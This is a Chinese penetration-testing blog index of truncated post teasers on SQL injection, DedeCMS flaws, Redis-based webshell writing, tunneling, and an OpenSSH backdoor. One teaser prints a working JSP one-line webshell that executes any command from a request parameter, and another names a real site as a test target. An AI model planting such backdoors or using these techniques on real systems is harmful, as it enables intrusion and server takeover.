Menu

渗透测试

2018-BlackHat-Tools-List
Android,iOS和移动黑客 易受攻击的iOS应用程序:Swift版 https://github.com/prateek147/DVIA-v2 代码评估 OWASP依赖性检查 https://github.com/jeremylong/DependencyCheck 美洲狮扫描 [...]
DEDECMS找后台目录
阿里的先知社区写了一篇dedecms找后台目录的文章 并且给出了一个php版本的 传送门 原理和废话我不多说了 我直接上一个python版本 随便找一个dede的站来实验一下 http://www.hzxxgc.com/ 网站自己修改。 上代码: ##!/usr/bin/env python # [...]
redis绕过云盾写webshell提权08服务器
半年多没写文章了。 第一部分拿webshell: 前不久,我们公司被大批肉鸡DDOS,攻击来源大约有几千个IP。 我随便选择了那么几十个打算追查一下攻击者。找到远控准备直接报警抓人。 我就随便选择其中一次追查攻击来源简单写一片日志吧。 扫描其中某一个IP [...]
ImageMagick—-Remote Command Execute in WordPress 4.5.1
ImageMagick ImageMagick 昨天曝出 CVE-2016-3714,Java、PHP 的库也受其影响。其中 PHP 的库 Imagick 应用广泛,波及也大。Wordpress 也就是受此漏洞影响出现了 RCE。 这个漏洞很蠢,ImageMagick 在 [...]
一个稳定的UDP反向端口映射方法
使用到的工具 https://github.com/ring04h/udptunnel http://fuzz.wuyun.org/src/s5.py 原理实例图   编译可执行程序 server# git clone https://github.com/ring04h/udptunnel.git [...]
jsp内网探测脚本&简单代理访问
废话不多说,直接上图: 1.直接访问默认扫描当前IP的C段,获取标题、web容器. 2.可以自定义传入需要扫描的段,传入参数ip即可 3.代理访问参数为url,可简单的访问内网的web,对了,我还加载了网站里的css,做到尽量看上去和直接访问的效果一样 <%@ page language="java" [...]
SQL注入速查表(下)与Oracle注入速查表
一、SQL注入速查表(下) 0x00 目录 盲注 关于盲注 实战中的盲注实例 延时盲注 WAITFOR DELAY [time](S) 实例 BENCHMARK()(M) 实例 pg_sleep(seconds)(P) 掩盖痕迹 -sp_password log bypass(S) 注入测试 [...]
SQL注入速查表(上)
  0x00 关于SQL注入速查表 现在仅支持MySQL、Microsoft SQL Server,以及一部分ORACLE和PostgreSQL。大部分样例都不能保证每一个场景都适用。现实场景由于各种插入语、不同的代码环境以及各种不常见甚至奇特的SQL语句,而经常发生变化。 [...]
Jsp一句话木马后门
一:执行系统命令: 无回显执行系统命令: <%Runtime.getRuntime().exec(request.getParameter("i"));%> 请求:http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls [...]
Linux渗透之openSSH后门
首先拿下服务器shell权限,其次利用各种方式提下root! 拿下root之后才是开始: 1.首先查看ssh版本: [email protected]:~# ssh -V OpenSSH_6.0p1 Debian-4+deb7u2, OpenSSL 1.0.1e 11 Feb 2013   2.下载SSH [...]
Dedecms远程写文件漏洞
0x00 漏洞概述 2015年6月17日seclists网站上公布了Dedecms的一个远程getshell漏洞细节,造成这个漏洞的原因也有些让人玩味。官方已在2015年6月18日发布了修复版本,下载链接:http://www.dedecms.com/products/dedecms/downloads/ [...]
内网转发工具———-tunna
他的原理就是个HTTP tunneling工具。 +——————————————-+ [...]
SQLMAP 防火墙的绕过与过滤
[为0x00] – 简介 [0X01] – 过滤闪避(MySQL的) [0x01a] – 旁路功能和关键字过滤 [0x01b] – 绕过正则表达式过滤 [0X02] – 通常情况下旁路技术 [0X03] – 高级旁路技术 [0x03a] [...]